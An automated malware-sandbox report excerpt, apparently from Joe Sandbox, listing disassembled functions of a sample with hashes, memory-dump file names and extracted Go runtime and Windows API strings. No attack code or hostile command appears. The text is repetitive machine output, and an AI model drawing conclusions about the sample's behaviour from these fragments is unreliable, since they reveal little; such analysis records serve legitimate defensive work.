                                                                                • String ID: (forced) B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked method: ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=%!(EXTRA %s %q: %s(MISSING)(unknown)*invalid*, Offset=, newval=, oldval=, size = , tail =$ KiB total, MB stacks, [recovered] allocCount found at *( gcscandone m->gsignal= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>%!(BADWIDTH)) p->status=, cons/mark -byte li$ KiB work, exp.) for freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC), elemsize=, npages = -syncWithWU/dev/stderr/dev/stdout30517578125: frame.sp=AssemblyRefBLAKE2b$ [controller reset] called using nil *, g->atomicstatus=, gp->atomicstatus=149011611938476562520060102150405Z07007450580596923828125ARM64 little endianAltai Standard TimeBahia Standard TimeCanadian_AboriginalChina Standard TimeCreateSymbolicLinkWCryptReleaseC$% util(...), i = , not .reloc390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticENCLogENCMapExpectExportFlags=FormatFridayGOROOTGetACPGothicHangulHatranHebrewHyphenIgnoreImportKaithiKhojkiLepchaLycianLydianMIPS16ModuleMondayNativeRejangSCHED STREETSt
                                                                                • API String ID: 0-3417895583
                                                                                • Opcode ID: dc524650712033d123f7ccb3f72be8b0b37225db6392b4cba354ba8c624e902f
                                                                                • Instruction ID: 460b52175ed56940217b39bb424073ec492db686902de3b025c485a10ac3465d
                                                                                • Opcode Fuzzy Hash: dc524650712033d123f7ccb3f72be8b0b37225db6392b4cba354ba8c624e902f
                                                                                • Instruction Fuzzy Hash: 0251D3B4908B819FC304EF25E291B6EBBE1AF88748F41892DF4C88B352D774D944DB52
                                                                                Function 00AEFDE0 Relevance: 6.3, Strings: 5, Instructions: 76COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • wirep: invalid p statex509: malformed issuerzero length BIT STRINGzlib: invalid checksum) must be a power of 223283064365386962890625<invalid .Value>Argentina Standard TimeAstrakhan Standard TimeCertGetCertificateChainDeleteVolumeMountPointWDestroyEnvi, xrefs: 00AEFED5
                                                                                • wirep: p->m=worker mode wtsapi32.dll != sweepgen (default %q) (default %v) MB globals, MB) workers= called from flushedWork idlethreads= in host name is nil, not nStackRoots= out of range pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= wo, xrefs: 00AEFE4D
                                                                                • wirep: already in goworkbuf is not emptywrite of Go pointer ws2_32.dll not foundx509: malformed spkizlib: invalid header of unexported method pcHeader.textStart= previous allocCount=, levelBits[level] = 186264514923095703125931322574615478515625AdjustTokenPri, xrefs: 00AEFEF4
                                                                                • ) p->status=, cons/mark -byte limit152587890625762939453125Align 1-ByteArchitectureBidi_ControlCfgMgr32.dllCoCreateGuidCreateEventWCreateMutexWDeclSecurityDispCallFuncDispGetParamECDSA-SHA256ECDSA-SHA384ECDSA-SHA512ErrUnknownPCExportedTypeFieldMarshalFindNext, xrefs: 00AEFEA1
                                                                                • ()*+,-./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02, xrefs: 00AEFE77
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ()*+,-./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02$) p->status=, cons/mark -byte limit152587890625762939453125Align 1-ByteArchitectureBidi_ControlCfgMgr32.dllCoCreateGuidCreateEventWCreateMutexWDeclSecurityDispCallFuncDispGetParamECDSA-SHA256ECDSA-SHA384ECDSA-SHA512ErrUnknownPCExportedTypeFieldMarshalFindNext$wirep: already in goworkbuf is not emptywrite of Go pointer ws2_32.dll not foundx509: malformed spkizlib: invalid header of unexported method pcHeader.textStart= previous allocCount=, levelBits[level] = 186264514923095703125931322574615478515625AdjustTokenPri$wirep: invalid p statex509: malformed issuerzero length BIT STRINGzlib: invalid checksum) must be a power of 223283064365386962890625<invalid .Value>Argentina Standard TimeAstrakhan Standard TimeCertGetCertificateChainDeleteVolumeMountPointWDestroyEnvi$wirep: p->m=worker mode wtsapi32.dll != sweepgen (default %q) (default %v) MB globals, MB) workers= called from flushedWork idlethreads= in host name is nil, not nStackRoots= out of range pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= wo
                                                                                • API String ID: 0-1935930808
                                                                                • Opcode ID: 0e71991c3413a38bc6c6c971115fef64b93dcade1c99336920515059ce361f3e
                                                                                • Instruction ID: 4d905353dfe0a6bc243fcc7bfea84211faad0066e9b11674caef25802fa7ea9e
                                                                                • Opcode Fuzzy Hash: 0e71991c3413a38bc6c6c971115fef64b93dcade1c99336920515059ce361f3e
                                                                                • Instruction Fuzzy Hash: 6731B6B4A09B45CFD700EF69D29571ABBE4FF88708F41896DE8888B312E774D844DB52
                                                                                Function 00AE0690 Relevance: 6.3, Strings: 5, Instructions: 71COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • ), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADT, xrefs: 00AE0783
                                                                                • runtime: failed to create new OS thread (have runtime: name offset base pointer out of rangeruntime: panic before malloc heap initializedruntime: text offset base pointer out of rangeruntime: type offset base pointer out of rangesignal arrived during external, xrefs: 00AE072E
                                                                                • runtime/internal/runtime: level = runtime: nameOff runtime: pointer runtime: summary[runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spanthread exhaustionunknown caller pcunknown type kindwait , xrefs: 00AE079E
                                                                                • already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcdef2384185791015625: value of type AddDllDirectory, xrefs: 00AE0759
                                                                                • ., xrefs: 00AE0737
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: runtime/internal/runtime: level = runtime: nameOff runtime: pointer runtime: summary[runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spanthread exhaustionunknown caller pcunknown type kindwait $ already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcdef2384185791015625: value of type AddDllDirectory$), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADT$.$runtime: failed to create new OS thread (have runtime: name offset base pointer out of rangeruntime: panic before malloc heap initializedruntime: text offset base pointer out of rangeruntime: type offset base pointer out of rangesignal arrived during external
                                                                                • API String ID: 0-1382676746
                                                                                • Opcode ID: 39e6ebe697231075b71db1dd91c60982b4d8c09402080e457965d0b1b8c0787f
                                                                                • Instruction ID: c32f855c7476369b8866649fa90399896ff5dda93846afcf8f9d4e398cf65457
                                                                                • Opcode Fuzzy Hash: 39e6ebe697231075b71db1dd91c60982b4d8c09402080e457965d0b1b8c0787f
                                                                                • Instruction Fuzzy Hash: 3831E2B49097449FC304EF7AE69575EBBE4BF88308F414D2DE48897352E7B499888F42
                                                                                Function 00ADDFC0 Relevance: 5.2, Strings: 4, Instructions: 230COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • runtime: GetQueuedCompletionStatusEx failed (errno= runtime: use of FixAlloc_Alloc before FixAlloc_Initspan set block with unpopped elements found in resetx509: cannot verify signature: insecure algorithm %vcompileCallback: argument size is larger than uintpt, xrefs: 00ADE1E7
                                                                                • ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADTASTAprAugBSTCATCDTCETCLRCSTDSADecDltE (EATEDTEETEOFESTFPOFebFriGMTHDTHSTHanIATIDTISTJSTJanJulJunKSTLaoMD4MD5MDTMPXMSKMSTMarMayMonMroNDTNS, xrefs: 00ADE212
                                                                                • runtime: netpoll failedruntime: s.allocCount= s.allocCount > s.nelemsschedule: holding lockssegment length too longshrinkstack at bad timespan has no free stacksstack growth after forksyntax error in patternsystem huge page size (too many pointers (>10)truncat, xrefs: 00ADE22D
                                                                                • 4, xrefs: 00ADE1F0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADTASTAprAugBSTCATCDTCETCLRCSTDSADecDltE (EATEDTEETEOFESTFPOFebFriGMTHDTHSTHanIATIDTISTJSTJanJulJunKSTLaoMD4MD5MDTMPXMSKMSTMarMayMonMroNDTNS$4$runtime: GetQueuedCompletionStatusEx failed (errno= runtime: use of FixAlloc_Alloc before FixAlloc_Initspan set block with unpopped elements found in resetx509: cannot verify signature: insecure algorithm %vcompileCallback: argument size is larger than uintpt$runtime: netpoll failedruntime: s.allocCount= s.allocCount > s.nelemsschedule: holding lockssegment length too longshrinkstack at bad timespan has no free stacksstack growth after forksyntax error in patternsystem huge page size (too many pointers (>10)truncat
                                                                                • API String ID: 0-3734344902
                                                                                • Opcode ID: d4a73b888aae0450133119f1918c2f34ecd19b0c56d230ef74b11b92a85bb253
                                                                                • Instruction ID: bb14576dded185a2d38c58210d34a6a1518d8a417bc73da607655d8ac82f8a7b
                                                                                • Opcode Fuzzy Hash: d4a73b888aae0450133119f1918c2f34ecd19b0c56d230ef74b11b92a85bb253
                                                                                • Instruction Fuzzy Hash: F8A17AB46093418FD320EF25C580B5EBBE1BF88748F04892EE89A8B381D774D945CB93
                                                                                Function 00AE8D30 Relevance: 5.2, Strings: 4, Instructions: 229COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • forEachP: not donegarbage collectionidentifier removedindex out of rangeinput/output errorinvalid character multihop attemptedno child processesno locks availablenon-minimal lengthoperation canceled :, xrefs: 00AE9062
                                                                                • ", xrefs: 00AE9081
                                                                                • forEachP: P did not run fnfreedefer with d.fn != nilinitSpan: unaligned lengthinvalid argument to Int31ninvalid argument to Int63ninvalid port %q after hostinvalid request descriptorname not unique on networkno CSI structure availableno message of desired type, xrefs: 00AE904C
                                                                                • forEachP: sched.safePointWait != 0invalid padding bits in BIT STRINGmspan.ensureSwept: m is not lockedout of memory allocating allArenaspkcs7: attribute %s does not exist : ChanDir of non-chan type : Field index out of bounds : Field of non-, xrefs: 00AE9078
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: "$forEachP: P did not run fnfreedefer with d.fn != nilinitSpan: unaligned lengthinvalid argument to Int31ninvalid argument to Int63ninvalid port %q after hostinvalid request descriptorname not unique on networkno CSI structure availableno message of desired type$forEachP: not donegarbage collectionidentifier removedindex out of rangeinput/output errorinvalid character multihop attemptedno child processesno locks availablenon-minimal lengthoperation canceled :$forEachP: sched.safePointWait != 0invalid padding bits in BIT STRINGmspan.ensureSwept: m is not lockedout of memory allocating allArenaspkcs7: attribute %s does not exist : ChanDir of non-chan type : Field index out of bounds : Field of non-
                                                                                • API String ID: 0-3226464621
                                                                                • Opcode ID: 653a6764c67912497ad2efba466a8a04d805e698cdc5f7b2fe8b19ad971766e5
                                                                                • Instruction ID: d479aa3026e9d70597242e06f9d2f4f44de5346be62c4d652b7bcb4b80b32b6d
                                                                                • Opcode Fuzzy Hash: 653a6764c67912497ad2efba466a8a04d805e698cdc5f7b2fe8b19ad971766e5
                                                                                • Instruction Fuzzy Hash: 23A16674609345CFC304DF26D5D4AAABBF1FB99304F10486DE8899B3A2DB34E949CB52
                                                                                Function 00AF8C10 Relevance: 5.2, Strings: 4, Instructions: 221COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • nil stackbaseout of memoryparsing time powrprof.dll, xrefs: 00AF8F2C
                                                                                • stack growth not allowed in system callsuspendG from non-preemptible goroutinetags don't match (%d vs %+v) %+v %s @%dtraceback: unexpected SPWRITE function transport endpoint is already connectedx509: failed to parse URI constraint %qx509: invalid NameConstrai, xrefs: 00AF8F42
                                                                                • racy sudog adjustment due to parking on channelruntime: CreateIoCompletionPort failed (errno= slice bounds out of range [::%x] with length %yx509: internal error: IP SAN %x failed to parsex509: malformed public key algorithm identifierCreateWaitableTimerEx whe, xrefs: 00AF8EA1
                                                                                • ', xrefs: 00AF8F4B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: '$nil stackbaseout of memoryparsing time powrprof.dll$racy sudog adjustment due to parking on channelruntime: CreateIoCompletionPort failed (errno= slice bounds out of range [::%x] with length %yx509: internal error: IP SAN %x failed to parsex509: malformed public key algorithm identifierCreateWaitableTimerEx whe$stack growth not allowed in system callsuspendG from non-preemptible goroutinetags don't match (%d vs %+v) %+v %s @%dtraceback: unexpected SPWRITE function transport endpoint is already connectedx509: failed to parse URI constraint %qx509: invalid NameConstrai
                                                                                • API String ID: 0-3277552357
                                                                                • Opcode ID: 2b74b2073f5fd8f99f7bcb142dfee246a4f39738009fcc20c4949aaeb6badd98
                                                                                • Instruction ID: 9a5a93f7ca22735906d2db9a3f95b206efcff18d668c1c8ce506e7151a5828f0
                                                                                • Opcode Fuzzy Hash: 2b74b2073f5fd8f99f7bcb142dfee246a4f39738009fcc20c4949aaeb6badd98
                                                                                • Instruction Fuzzy Hash: 32A1DF746093448FC758DF68C180A6AFBF1BF88710F15896EF99987392EB74E844CB46
                                                                                Function 00AC1D80 Relevance: 5.2, Strings: 4, Instructions: 198COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • runtime: heapBitsSetTypeGCProg: total bits runtime: releaseSudog with non-nil gp.paramruntime:stoplockedm: lockedg (atomicstatus=transform: inconsistent byte count returnedunfinished open-coded defers in deferreturnunknown runnable goroutine during bootstrapx5, xrefs: 00AC1E6C
                                                                                • but progSize nmidlelocked= on zero Value out of range procedure in to finalizer untyped args -thread limit/log/filter.go/log/helper.go1907348632812595367431640625: extra text: Align 16-BytesAlign 32-BytesAlign 64-BytesBstrFromVectorCET CompatibleCertClos, xrefs: 00AC1E96
                                                                                • +, xrefs: 00AC1ED3
                                                                                • heapBitsSetTypeGCProg: unexpected bit countinterrupted system call should be restartedmethodValueCallFrameObjs is not in a modulemult64bitPow10: power of 10 is out of rangemultiple Read calls return no data or errornon in-use span found with specials bit setof, xrefs: 00AC1ECA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
